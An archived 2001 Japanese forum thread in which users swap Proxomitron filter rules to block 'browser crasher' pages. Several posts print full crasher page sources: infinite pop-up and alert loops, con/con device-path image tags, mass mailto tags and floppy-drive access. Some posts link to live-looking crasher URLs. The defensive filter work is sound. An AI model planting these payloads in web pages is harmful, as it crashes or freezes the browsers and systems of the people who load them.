5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ブラクラにProxomitronで対抗するスレ

1 :名無しさん@お腹いっぱい。:2001/08/20(月) 11:28 ID:dbxWS/6c
Local File Access KillerやProtocol Src Killer などのWebフィルタ必需。
まずはhttp://whkbrxtr.tripod.com/urajindou2.html

2 :1:2001/08/20(月) 11:35 ID:dbxWS/6c
Windows版に立てるべきだったかな?
Onload UnloaderとProtocol Src Killerで大体は防げた。

3 :名無しさん@お腹いっぱい。 :2001/08/20(月) 11:43 ID:wskWno0c
右クリに入れたリンク先チェック(http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgiに渡す)では警報

4 :名無しさん@お腹いっぱい。:2001/08/20(月) 12:22 ID:dbxWS/6c
>>3
Proxomitronを使ってわざとブラクラを踏むスレ。

5 ::2001/08/20(月) 12:54 ID:X9415Eoc
自分でもアプレットやスクリプトの開発してるから
Proxomitronで無差別フィルタはやっぱり使いづらい
やっぱりセキュリティゾーン登録を強化したいな
サーバ別じゃなくてサイト別に

6 :3:2001/08/20(月) 12:56 ID:X9415Eoc
プロキシのフィルタ作りも面白いけどね

7 :名無しさん@お腹いっぱい。 :2001/08/20(月) 13:17 ID:???
mailtoとFDDとconconのサンプル
HTMLベタで書いてあるから、JavaScript止めた位じゃ防げない
右クリJavaScriptからでなくても、オフラインでチェックできるんだけど(http://www.coara.or.jp/~tkuri/PBCC/
ま、ブラクラチェック書ける奴は、テストでブラクラも書けないと(藁
あくまでもテスト用(藁藁
そのうちこのスレもブラクラギャラリーになったりして(爆
みんなもチャレンジしてみそ

8 :名無しさん@お腹いっぱい。 :2001/08/20(月) 13:29 ID:???
>>7
ゴルァ!オフラインチェック(http://www.coara.or.jp/~tkuri/PBCC/)ダメじゃん
さ、仕事に戻ろう
あうー休みヴォケで勤労意欲が全然湧かない

9 :名無しさん@お腹いっぱい。:2001/08/20(月) 13:31 ID:dbxWS/6c
Protocol src killer の改造が必要デシタ。
どっかの行に file:| と入れると幸せになります。

10 :金玉のシワとシワ合わせて幸せ:2001/08/20(月) 13:37 ID:???
>>9
HDDに逝くのね(藁

11 :名無しさん@お腹いっぱい。:2001/08/20(月) 13:46 ID:n2pqhFZ2
モーホー発見

12 :名無しさん@お腹いっぱい。 :2001/08/20(月) 13:53 ID:???
楽しいActiveペケ
愉快なJAVAアプ

13 :名無しさん@お腹いっぱい。 :2001/08/20(月) 14:40 ID:???
うへ、戻って来て見たら全然増えてねえや
どうやら分かってない夏休み厨房は一匹だけか
程度低いな(藁

14 :名無しさん@お腹いっぱい。:2001/08/21(火) 00:02 ID:f92H0ECk
JavaScriptの無限ループは防げない?
やっぱりJavaScriptを切るしか無いのか。

15 :名無しさん@お腹いっぱい。 :2001/08/21(火) 04:17 ID:???
>JavaScriptを切る
てゆーか、
未知のサーバ=インターネット・ゾーンのレベルで、
ActiveX、JavaScript、JAVAアプレットの有効/無効を、
ダイアログ確認にしといたら?すげーウザいけどね。

16 :Bluck:2001/08/21(火) 13:50 ID:mQi8LaBk
まえ、それやってみたけどほんとにウザいよ。
完全に表示されるまで何回もダイアログボックス閉じないといけない。

17 :名無しさん@お腹いっぱい。 :2001/08/21(火) 13:56 ID:???
>>16
そりゃ本当に怪しいHPだ!
制限付きゾーンに放り込んで何もさせちゃいかん!
と思うが、まあ、そこは自己責任で。

18 :名無しさん@お腹いっぱい。 :2001/08/21(火) 15:25 ID:???
>>1
Win板は厨房ばっかで漏れも全然逝かないから、ここでいいよ。

19 :Bluck:2001/08/21(火) 21:36 ID:mQi8LaBk
>>17
なんかの公式ページとかでもいろいろごちゃごちゃしてるのあるよ。
怪しいところとは限らない。

20 :名無しさん@お腹いっぱい。 :2001/08/21(火) 22:52 ID:???
>>19
それでもウザくて表示とかに支障なけりゃ制限付きゾーン逝き。
まともそうな(?)メーカーとかベンダで、文句ねじ込めそうな所なら、信頼済みに入れる。
ちなみにウチの信頼済みサーバ37件に対して、制限付きサーバは434件(笑)。
CSV作ってレジストリにまとめて放り込む。

21 :名無しさん@お腹いっぱい。:2001/08/21(火) 23:05 ID:???
http://ynfjgt.50megs.com/mika.html
IEが落ちます。

22 :名無しさん@お腹いっぱい。:2001/08/22(水) 06:22 ID:???
スクリプトをダイアログ表示にしてるとかなり大変。

23 :___:2001/08/22(水) 09:04 ID:PQjZXKpk
JavaScript といっても危険なのは無限ループくらいだから、俺は自作フィルタで防いでる。
あとはQ2サイトでよく使われる onload、onunload、onbeforeunload あたりをつぶせばOK。
実際ブラクラは必ずクリックして確かめているけど、防げなかったのは一つも無かった。

24 :actkyo002059.adsl.ppp.infoweb.ne.jp:2001/08/22(水) 17:36 ID:Sjh4otqw
ちょっとプロキシテスト。
>>21
ブラクラチェッカーでは引っかからなかったYO!

25 :名無しさん@お腹いっぱい。 :2001/08/22(水) 19:46 ID:???
>>21
うーん、確かにブラクラチェッカーでは引っかからないけど、
ソース覗くとJavaScriptべったり。
誰か踏んでみてちょうだい。

26 :actkyo003200.adsl.ppp.infoweb.ne.jp:2001/08/23(木) 02:16 ID:???
>>21
終了するときに踏んでみようかな。

27 :actkyo003200.adsl.ppp.infoweb.ne.jp:2001/08/23(木) 02:19 ID:???
もう一回プロキシテストします。スマソ

Proxomitronでonload・onunloadとfileプロトコルへのアクセスは防げている模様。
無限ループのフィルタきぼーん。>>23

28 : :2001/08/24(金) 00:58 ID:???
http://kuma1.virtualave.net/howto/kiken/d/118.jpg

29 :名無しさん@お腹いっぱい。:2001/08/24(金) 01:24 ID:???
>>28
ブラクラ。いや、そういうスレだけど。
無限ループのフィルタがないのでキツイです。

30 :名無しさん@お腹いっぱい。:2001/08/24(金) 01:35 ID:???
Bounds = "<script*</script>"
Limit = 1024
Match = "*(for|while)*"
"&(*window.(open|scroll))"
とりあえず、こんなの使ってるよ。
関係ないのもいっぱいひっかかるが、
まぁ実害無い。

31 :山師さん:2001/08/24(金) 09:47 ID:???
age

32 :名無しさん@お腹いっぱい。:2001/08/24(金) 11:03 ID:???
>>21はリンク先がなかった・・・
>>28は途中でOSに落ちるかと聞かれた。
Win98+IE5.01+SP2+暗号強度128BIT

33 :名無しさん@お腹いっぱい。:2001/08/24(金) 12:27 ID:???
とりあえず http://kuma1.virtualave.net/howto/kiken/d/118.jpg 対策になるかな?

while対策

Name = "Kill While-Loop JavaScript"
Active = TRUE
Bounds = "(while) \([^\(\)]++\)*}"
Limit = 1024
Match = "((while) \([^><=\&\|\!\(\)]++\))\1 ({|) \2 }"
Replace = "{document.write("While-Loop Javascript found!");}"

for対策

Name = "Kill For-Loop JavaScript"
Active = TRUE
Limit = 1024
Match = "(for \([^;]++;[^><=\&\|\!;]++;[^\)]++\))\1 ({|) \2 }"
Replace = "{document.write("For-Loop Javascript found!");}"

refresh対策(Anti-Auto-Refresher改造版)

Name = "Anti-Auto-Refresher2"
Active = TRUE
URL = "^*.(jpg|jpeg|gif|png|bmp)"
Bounds = "<meta\s*>"
Limit = 256
Match = "*http-equiv=("|)refresh*content = ("|) ([0-9]++)\2 ((; url=("|)([^"'> ]++)\1)|) " *"
Replace = "\2seconds-refresh to <a href="\1">\1</a> killed!"

34 :名無しさん@お腹いっぱい。:2001/08/24(金) 17:19 ID:???
>>33
> refresh対策(Anti-Auto-Refresher改造版)

それだと http-equiv 属性と content 属性を逆にされたらフィルタリングできなくなるよ。
(これは細かいけど) 属性値を 0.1 とかにされても効かなくなるよ。

35 :名無し~3.EXE:2001/08/24(金) 20:57 ID:???
>>28 は、Image Checkerで防げますよ。

36 :33:2001/08/24(金) 20:57 ID:???
逆は気付いてた。一昨日それでエロサイトでrefresh食らったばかりから。
でも小数は盲点だったなあ…。

37 :34:2001/08/24(金) 23:47 ID:???
他にも

<meta http-equiv="refresh" content="1;; url=http://www.google.co.jp/">
<meta http-equiv="r&#101;fr&#101;sh" content="1; url=http://www.google.co.jp/">

…とか。2 番目の方法は実際に自分のサイトで使ってます。
Anti-Auto-Refresher が効かないように (笑
間にスペースなどの適当な文字をたくさん入れられ、
フィルタの Byte Limit を消費されてもだめです。これは
どんなに完璧に作ったとしても防げませんよね。

単なる meta refresh を防ぐフィルタでも作り込もうとすると
相当難しくなるので、ブラクラを防ぐフィルタとなると…。
余程隙を突かれない限り食らうことのないブラクラのために
どこまで通常のブラウジングを犠牲にするか。自分なりの妥協点を
見つけるのも大事だと思う。

最後に 33 さん、気分害されたなら本当にごめんなさい。

38 ::2001/08/25(土) 23:24 ID:???
ブラクラで無限JavaScriptにやられると、
Win9*系だとOSまで落ちますよね?
2000だと落ちないんでしょうか?
ちなみに、
Macだとループをストップさせられるし、
ストップさせなくても、
そのうち終わって(多分、割り当てメモリ使いきるまで)
ブラウザだけ強制終了させればすんじゃいます。

39 :38:2001/08/25(土) 23:29 ID:???
言い忘れたけど、
>>37は、OS9の話です。
OS×は使ったことないからわかんないや。
それと、
たまには、ブラクラ踏んで、
次から次に開く画面を見たいので、
激速なブラクラがあるところを教えてください。
ブックマークしておきます。

40 :名無しさん@お腹いっぱい。:2001/08/25(土) 23:31 ID:???
COSMO-GATEの認証先がブラクラ、これだとブラクラチェッカーがつかえないから恐いな…
ちなみに、COSMO-GATEはIDとパスワードによってリンク先のアドレスが分からないようにしてアクセスするCGIです。

41 :名無しさん@お腹いっぱい。:2001/08/25(土) 23:32 ID:???
無限ループに引っかかったけど、Ctrl+Alt+Delで一時停止できるので、その状態から強制終了。
Proxomitronで対抗していない。((藁

42 :38:2001/08/25(土) 23:43 ID:8FoAYjxA
>>40 タン
どこですか?
久しぶりにブラウザの花を咲かせてみたい!
>>41 タン
えっ、98でCtrl+Alt+Del で止められなかったけど。
その前にフリーズしただけだったのかな。

43 :プロクセ:2001/08/27(月) 01:23 ID:???
Proxomitronで閲覧したサイトをオフライン状態で履歴から見る時って、
やっぱjavascriptとかはまだ生きてるの?
それともproxomitronで処理したのが保存されてるのかな?

44 :名無しさん@お腹いっぱい。:01/09/02 01:43 ID:eAtUABQk
>>43
JavaScriptは殺しているかと。
駄目ならローカルにもフィルタをかければなお良い。

45 :名無しさん@お腹いっぱい。:01/09/03 06:37 ID:a5J34Q9M
>>43
当たり前だけど、
ブラウザで一回表示したキャッシュはその時表示した状態(頃したなら氏んでる)状態
直にhtmlを↓した場合はうpしてあるソースそのまま。

折れJSとActiveXはブラウザでオフにしてるからおみとろんでは何も掛けてないんだけど
そーするとキャッシュをオフラインで見た時JS関係は生きてる。
mailtoとかは全部氏んでる。

#ブラクラ踏んだ時ソース見たりしない?それで見れる氏んでるhtml
#自体は既にローカルに落ちてたモノを見てるんだから、当然と言えば当然。

46 :名無しさん@お腹いっぱい。:01/09/07 20:18 ID:URHwhxS2
age

47 :名無しさん@お腹いっぱい。:01/09/07 20:24 ID:???
>折れJSとActiveXはブラウザでオフにしてるからおみとろんでは何も掛けてないんだけど
>そーするとキャッシュをオフラインで見た時JS関係は生きてる。

これだとローカルで見たときにブラクラ食らうよね。

48 :名無しさん@お腹いっぱい。:01/09/07 20:28 ID:???
http://www2.strangeworld.org/image/sahra1725.jpg
これどうだろう?ソースが見れん。

49 :名無しさん@お腹いっぱい。:01/09/07 21:59 ID:???
>>48
404 Not Found と出るんですが・・・

50 :名無しさん@お腹いっぱい。:01/09/07 22:11 ID:???
>>49
また落ちた…3回目だ、鬱。。。

51 :名無しさん@お腹いっぱい。:01/09/11 15:24 ID:???
>>48

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=x-sjis">
<TITLE>JAVA COM</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" LINK="#0000FF" VLINK="#9276FF" ALINK="#FF0000">
<img width="1" height="1" src="file://c|/con/con/con">
<script language="JavaScript">
<!--
i = 0;
while (i < 99) {
window.open("res://ie4tour.dll/welcome.htm");
window.open('mailto:takako@seisai.net');
window.open('facecrash.htm');
i++;
}
// -->
</script>
<noscript>
<CENTER>
<font style="font-size:999pt"><a href="iecrash.html">ENTER</a></font>
</noscript>
</CENTER>
</BODY>
</HTML>

52 :Kramer:01/09/11 19:56 ID:c7OgpYyM
>>48
とりあえず、影響はなかったな。
JavaScriptも無効にしてるし。

53 :名無しさん@お腹いっぱい。:01/09/14 17:46 ID:oBD5bPO6
良スレage

54 :名無しさん@お腹いっぱい。:01/09/21 22:33 ID:cTWjc3wc
ttp://odin.prohosting.com/~fukusyu/arashi/cd_20010912/pem.html

某アイドルグループが歌ってる曲の歌詞が表示されたあと、
metaで様々な種類のブラクラを持ち合わせたページに飛ばされます。
Javaスクリプト無限ループ、alertウィンドウ出まくり、不正なProtocol src、
conconバグ、FDDアタックなどが確認されています。
このページをブロックできれば、たいていのブラクラは防げるでしょうね。

55 :名無しさん@お腹いっぱい。:01/09/22 03:07 ID:POIVTt7g
完全に撃墜成功>>54

refreshタグブロック
無限Javascriptブロック
mailtoブロック
ローカルディスクへのリンクブロック

56 :名無しさん@お腹いっぱい。:01/09/22 04:29 ID:???
結果だけ報告されても(´Д`;)

57 :名無しさん@お腹いっぱい。:01/09/22 13:45 ID:Yyuz/i4M
>>54
Alertウインドウ出まくったんで強制終了させました。
これを防ぎたいのですが、どんなフィルタを書けばいいんですか?

<SCRIPT LANGUAGE="JavaScript">
 for ( ; ; ) {
 window.alert("--------------------------------")
 }
</SCRIPT>
これだと思うんですけど・・・。

58 :名無しさん@お腹いっぱい。:01/09/22 14:08 ID:POIVTt7g
>>33のfor対策ってのがそれなんじゃない?

59 :名無しさん@お腹いっぱい。:01/09/22 14:10 ID:oNxCBvU6
>>54 のところへ行ったけど何にもならんかった。
どうやら防げているようだが良く分からない。

60 :名無しさん@お腹いっぱい。:01/09/22 14:16 ID:VxFnzQO2
すまん。スレ違いだろうけど、誰か2chに書き込んだ後の
スレッドの文字化けとスレッド一覧の文字化けを防ぐ
フィルタ持ってないでしょうか?

61 :名無し~3.EXE:01/09/22 14:29 ID:???
>>60 ここはブラクラ対策がメインだから、Win板で聞いた方が適切だと思いま
すが、Part4スレのP3-417さん作のフィルターです。一部弄っているので、オ
リジナルとは、異なります。[HTTP hearders]のフィルターです。


In = FALSE
Out = TRUE
Key = "URL: 2ch Jump htm to html (Out)"
Match = "(http://([^.]++{2,9}.2ch.net|www(2|).bbspink.com)/[^/]++{2,20}/(index(|2)|subback).htm)\1((^?)|l.gz)"
Replace = "$JUMP(\1l)"

62 :名無しさん@お腹いっぱい。:01/09/22 17:41 ID:???
>>61
ありがとう。助かったよ。スレ違いスマソ

63 :名無し~3.EXE:01/09/22 18:27 ID:???
>>54 のサイト嵐と荒しを掛けてるんだね。で、dbug使ってどのフィルターが
効いているのか、見てみたんで、書いときます。

Major Sites Ad Killer (2001/09/20)、AD Killer 1.4、Kill the worst Pop
-Up windows、Kill For-Loop JavaScript、Trinity's Protocol Killer、
Local File Access Killer、Protocol src killer (2001/07/24)

64 :名無しさん@お腹いっぱい。:01/09/22 18:57 ID:BZVj1W2s
あれ、>>54のFDアタックが防げなかった。

srcは殺してるはずなんですけど?

ソース貼って頂けないでしょうか。
>>54の先にあるブラクラ本体の方のです。

65 :名無しさん@お腹いっぱい。:01/09/22 21:03 ID:???
IE6+セキュリティ高(カスタマイズ)+Protocol Src Killer+Local File Access Killer+Anti-Auto-Refresher+無限ループ対策でもブラクラに引っかかった。
が、IEが落ちただけで何の影響もなかったけど、7どうよ?

66 :名無しさん@お腹いっぱい。:01/09/23 02:36 ID:NtgZ5.1Y
>>64
関係部分のみです。

<SCRIPT LANGUAGE="JavaScript">
 <!--
 for (i=0; i<100; ++i) {
 window.open();
 }
 -->
</SCRIPT>

<SCRIPT LANGUAGE="JavaScript">
 for ( ; ; ) {
 window.alert("--------------------------------")
 }
</SCRIPT>

<IMG SRC="file:///c|/con/con"><IMG SRC="file:///c|/con/con"><IMG SRC="file:///c|/con/con">

<IMG SRC="mailto:1"><IMG SRC="mailto:2"><IMG SRC="mailto:3">
<IMG SRC="mailto:4"><IMG SRC="mailto:5"><IMG SRC="mailto:6">
<IMG SRC="mailto:7"><IMG SRC="mailto:8"><IMG SRC="mailto:9">

<IMG SRC="mailto:10"><IMG SRC="mailto:11"><IMG SRC="mailto:12">
<IMG SRC="mailto:13"><IMG SRC="mailto:14"><IMG SRC="mailto:15">
<IMG SRC="mailto:16"><IMG SRC="mailto:17"><IMG SRC="mailto:18">

<IMG SRC="mailto:19"><IMG SRC="mailto:20"><IMG SRC="mailto:21">
<IMG SRC="mailto:22"><IMG SRC="mailto:23"><IMG SRC="mailto:24">
<IMG SRC="mailto:25"><IMG SRC="mailto:26"><IMG SRC="mailto:27">

<IMG SRC="mailto:28"><IMG SRC="mailto:29"><IMG SRC="mailto:30">
<IMG SRC="mailto:31"><IMG SRC="mailto:32"><IMG SRC="mailto:33">
<IMG SRC="mailto:34"><IMG SRC="mailto:35"><IMG SRC="mailto:36">

<IMG SRC="a:\1.jpg"><IMG SRC="a:\2.jpg"><IMG SRC="a:\3.jpg">
<IMG SRC="a:\4.jpg"><IMG SRC="a:\5.jpg"><IMG SRC="a:\6.jpg">
<IMG SRC="a:\7.jpg"><IMG SRC="a:\8.jpg"><IMG SRC="a:\9.jpg">

<//--><//"--> </BODY>

67 :64:01/09/23 03:51 ID:lVQY8WzM
ありがとうございます。>>66

conconに引っ掛かるわけはないんで、
<IMG SRC="a:\1.jpg">の部分で、自分はやられたんだと思います。

Protocol Src Killer+Local File Access Killerでこの部分は防げないのでしょうか?

68 :67:01/09/23 04:28 ID:lVQY8WzM
>>66
とりあえず、自分でProtocol Src Killerにa:\を追加しました。
どうもでした。

69 :名無しさん@お腹いっぱい。:01/09/23 04:29 ID:???
オイラ単純に
<IMG SRC*a:*>
をターゲットにしてるけどそれじゃダメなんかなぁ?
だってローカルのAドライブにアクセスする必要ないし。

70 :名無し~3.EXE:01/09/23 11:02 ID:???
>>67 Trinity's Protocol Killerで防げますよ。

71 :名無しさん@お腹いっぱい。:01/09/23 13:37 ID:nud4pauY
とりあえずローカルへのアクセス全滅(多分)フィルタ

Name = "Local href_src killer"
Active = TRUE
Bounds = "<*>"
Limit = 256
Match = "<[^>]++(href|src)=("|)((file|[a-z]):[^ >"']+)\1 * >"
Replace = "<font size=1>[localfile \1]</font></a>"

72 :名無しさん@お腹いっぱい。:01/09/23 21:01 ID:n7rv3pfA
>>71

ありがとうございました。
Protocol Src Killerにaからzまで追加する手間が省けました。

今、ふと思ったんですが、<IMG SRC="a:\〜">で、"a"のところが"g"
などになっていて、そこに仮想ドライブを割り当てていた場合、マシンは
どういう反応をするんでしょうか。

愚問でした。

73 :名無しさん@お腹いっぱい:01/09/23 21:27 ID:???
http://www.geocities.co.jp/Bookend-Ohgai/1361/tura/sinrei.jpg

74 :名無しさん@お腹いっぱい。:01/09/23 23:20 ID:PQGYVymU
ネットスケープだと<IMG SRC="a:\1.jpg">ではやられないね。

75 :名無しさん@お腹イパーイ:01/09/23 23:43 ID:???
>>1
R焼き&WinMX使用中に踏んでしまった。鬱。

…でも、ネスケ&Win2000&P3/1GHz&RAM512MBのおかげで助かった。
IEだったらたぶん焼きミスってる。

76 :75:01/09/23 23:47 ID:???
とりあえずProxomitronを入れてみる事にした。
そんな自分はまさに>>1の思惑通り?

77 :1:01/09/24 00:24 ID:ZF31Fpjs
>>76
   / ̄ ̄ ̄ ̄ ̄ ミ
  /   ,――――-ミ
 /  /  /   \ |
 |  /   ,(・) (・) |
  (6       つ  |
  |      ___  |   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  |      /__/ /  < 困惑通り。なわけねえだろ!
/|         /\   \__________

78 :名無しさん@お腹いっぱい。:01/09/24 01:00 ID:???
>>76,>>77
どっかで見たことそのまま書いとく。

初心者IE
知ったか中級者ネスケ
上級者IE+オミトロン(+タブブラウザ)

79 :名無しさん@お腹いっぱい。:01/09/24 09:36 ID:???
>>78
漏れはIE+Proxomitron。
タブブラウザは発想は面白いが、IEの使い勝手がないから使ってない。
そういう意味ではfubはけっこういいかと。

80 :名無しさん@お腹いっぱい。:01/09/26 15:34 ID:???
<html>

<head>
<title>Beyond The Net</title>
</head>
<body>

<p><img src="JavaScript:resizeTo( 100, 100 );setInterval( 'moveTo( Math.random() * screen.width, Math.random() * screen.height )', 50 );"></p>

</body>
</html>

81 :名無しさん@お腹いっぱい。:01/09/26 23:11 ID:cSR9M.Js
Name = "BrowserCrasher FUCK"
Active = TRUE
Bounds = "<*>"
Limit = 2048
Match = "<*file://*>|<*?\\*>|<*mailto:**>|"
Replace = "<!-- BrowserCrasher -->"

始めて作ったやつなんだが、
かなり誤爆しそう(鬱

82 :81:01/09/27 00:09 ID:???
ってできてないし
逝ってこよう

83 :名無しさん@お腹いっぱい。:01/09/27 03:34 ID:???
Mozilla+おみとろん ですが何か?

84 :名無しさん@お腹いっぱい。:01/09/28 08:10 ID:???
これってオミトロンって読むんだ。知らんかった・・・。

85 :名無しさん@お腹いっぱい。:01/09/30 00:39 ID:zsg8k9ec
Java Scriptの無限ループ対策フィルタを!

86 :名無しさん@お腹いっぱい。:01/09/30 01:45 ID:G3TwicaI
>>30はそうだろ?

87 :名無しさん@お腹いっぱい。:01/09/30 01:47 ID:G3TwicaI
>>33モナー。

88 :名無しさん@お腹いっぱい。:01/09/30 01:55 ID:???
Bounds = "<script*</script>"
Limit = 1024
Match = "*(for|while)*"
"&(*window.(open|scroll|alert))"

こうやって、>>54に対策したいのですが、
問題ありますか?

89 :名無しさん@お腹いっぱい。:01/09/30 01:56 ID:???
>>87
どっちが良くて、どう違うんですか?

90 :名無しさん@お腹いっぱい。:01/09/30 02:18 ID:G3TwicaI
>>30は置き換えがしてないので未完成かな?

>>33は個別に対応している。

どっちがいいとも・・・
分からないのなら>>33にしとけば?
俺もMatchの文法は良く分からん。

詳しい方、解説お願いします。

91 :名無しさん@お腹いっぱい。:01/09/30 02:23 ID:???
http://www.interq.or.jp/ox/satake/present/gaku0.jpg

92 :名無しさん@お腹いっぱい。:01/09/30 02:47 ID:zsg8k9ec
>>71入れてるんだけど、>>91でゴーーーーっとa:がアクセスされる。
なんで?

93 :ソース(一部"削除"):01/09/30 02:58 ID:G3TwicaI
<HTML>
<head>
<title>
氏ね!
</title>
</head>
<body>

<img src="file://c:\windows\con\con\con">
<img src="file://c:\windows\prn\prn\prn">

<img src="mailto:omeko0@dot.com>
<img src="mailto:omeko1@dot.com>
<img src="mailto:omeko2@dot.com>
<img src="mailto:omeko3@dot.com>
<img src="mailto:omeko4@dot.com>
<img src="mailto:omeko5@dot.com>
<img src="mailto:omeko6@dot.com>
<img src="mailto:omeko7@dot.com>
<img src="mailto:omeko8@dot.com>
<img src="mailto:omeko9@dot.com>
<img src="mailto:omekoa@dot.com>
<img src="mailto:omekob@dot.com>
<img src="mailto:omekoc@dot.com>
<img src="mailto:omekod@dot.com>
<img src="mailto:omeko00@dot.com>
<img src="mailto:omeko01@dot.com>
<img src="mailto:omeko02@dot.com>
<img src="mailto:omeko03@dot.com>
<img src="mailto:omeko04@dot.com>
<img src="mailto:omeko05@dot.com>
<img src="mailto:omeko06@dot.com>
<img src="mailto:omeko07@dot.com>
<img src="mailto:omeko08@dot.com>
<img src="mailto:omeko09@dot.com>
<img src="mailto:omeko0a@dot.com>

<img src="file://a:\windows\con\con\con">
<img src="file://a:\windows\prn\prn\prn">
<img src="file://a:\windows\con\con\con">
<img src="file://a:\windows\prn\prn\prn">

<img src="file://a:a.jpg">
<img src="file://b:a.jpg">
<img src="file://c:a.jpg">
<img src="file://d:a.jpg">
<img src="file://e:a.jpg">
<img src="file://f:a.jpg">


</body>

94 :名無しさん@お腹いっぱい。:01/09/30 03:36 ID:tBPFRFK6
何でだろう???

テストではきっちり殺せるのに???

スキルの有る方、どうかご教授願えないでしょうか。

95 :名無しさん@お腹いっぱい。:01/09/30 03:38 ID:tBPFRFK6
Protocol Src Killer+>>71
で殺せるはずなんですが???

不思議だ???

96 :名無しさん@お腹いっぱい。:01/09/30 03:59 ID:???
ちゃんとjpgにもフィルタ効くようにしてるのか?

97 :名無しさん@お腹いっぱい。:01/09/30 04:19 ID:whGjce7E
どういうことでしょうか?

 URLのjpgと関係があるのでしょうか?

 <img src="file://a:a.jpg">
 のjpgは、src”file:で殺してるんですけど?

 全然私、分かってないのかも・・・

98 :名無しさん@お腹いっぱい。:01/09/30 09:52 ID:???
>>92-97
ttp://www.pluto.dti.ne.jp/~tengu/proxomitron/newfilters.html
ここのLocal File Access Killerを使えばいいんじゃないノカー?

99 :名無しさん@お腹いっぱい。:01/09/30 10:22 ID:a5Bb.yHo
>>91のURLは末尾がjpgになっています。proxomitronはこういうファイルには原則として
フィルターをかけませんのでモロに食らいます。
>>96のいうとおり、jpg等にもフィルターがかかるように設定しなければなりません。

http://yasai.2ch.net/test/read.cgi?bbs=win&key=994101139
の248以降で話が出ています。キーワードは
Filter image extension
Image Checker
です。普通のhtmlのブラクラは>>71で当然殺せます。

100 :名無しさん@お腹いっぱい。:01/09/30 12:32 ID:tsv.GZkA
>>91
ネットスケープだと無反応だ。
どうやら拡張子がjpgのは素直にJPEGファイルとして認識して、HTMLを解釈しないようだ。

244 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)